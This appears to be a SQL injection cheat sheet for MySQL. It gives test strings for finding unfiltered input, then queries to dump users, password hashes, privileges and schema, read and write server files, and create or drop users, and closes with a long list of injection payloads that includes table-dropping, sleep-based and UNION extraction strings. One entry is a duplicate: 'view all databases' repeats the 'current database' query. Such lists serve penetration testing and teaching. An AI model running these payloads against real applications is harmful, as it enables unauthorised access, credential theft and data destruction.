SQL Injection in MySql
1' OR '1'='1
1 AND 1=1
If both give the same result, it means filtering is not there, and the database is vulnerable
Dumping SQL tables
1. Get SQL version
SELECT @@version
2. Get Current user
SELECT user();
SELECT system_user();
3. List all database users (not system users!)
SELECT user FROM mysql.user;
4. List hash password for database users
SELECT host, user, password FROM mysql.user;
5. Now, you will want to dump all privileges in the databases
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
6. Dump DBA accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’;
7. View Current database
SELECT database()
8. View all databases
SELECT database()
9. Viewcolumns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
10. View tables
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
11. Find table by a column's name. For example you want to find a table with a column called username
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’;
12. Select by row number.
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0;
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1;
13. Read local file.
UNION ALL SELECT LOAD_FILE(‘file location’)
14. Write to local file
SELECT * FROM mytable INTO dumpfile ‘file with location’;
15. Get Hostname and IP address
SELECT @@hostname;
16. Create a new user
CREATE USER newuser IDENTIFIED BY ‘pass1′;
17. Delete existing user
DROP USER olduser;
18. Other Injections
'
"
/
/*
#
)
(
)'
('
and 1=1
and 1=2
and 1>2
and 1<=2
+and+1=1
+and+1=2
+and+1>2
+and+1<=2
/**/and/**/1=1
/**/and/**/1=2
/**/and/**/1>2
/**/and/**/1<=2
'or"='
' or'x'='x
"or"x"="x
')orx=x--
')or('x'='x
')or1=1--
0 or 1=1
'0 or 0=0--
" or 0=0--
or 0=0--
' or 0=0 #
" or 0=0 #
or 0=0#
'or 1='1
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
1' OR '1'='1
'='
' OR 1 = 1 -- -
' OR 1 -- -
1 EXEC SP_ (or EXEC XP_)
x';--
\'; DESC users; --
1\'1
1' AND non_existant_table = '1
1 AND non_existant_table = 1
' OR username IS NOT NULL OR username = '
1 UNI/**/ON SELECT ALL FROM WHERE
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --
';DROP table sampletable;--
';SELECT SLEEP(200);--
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'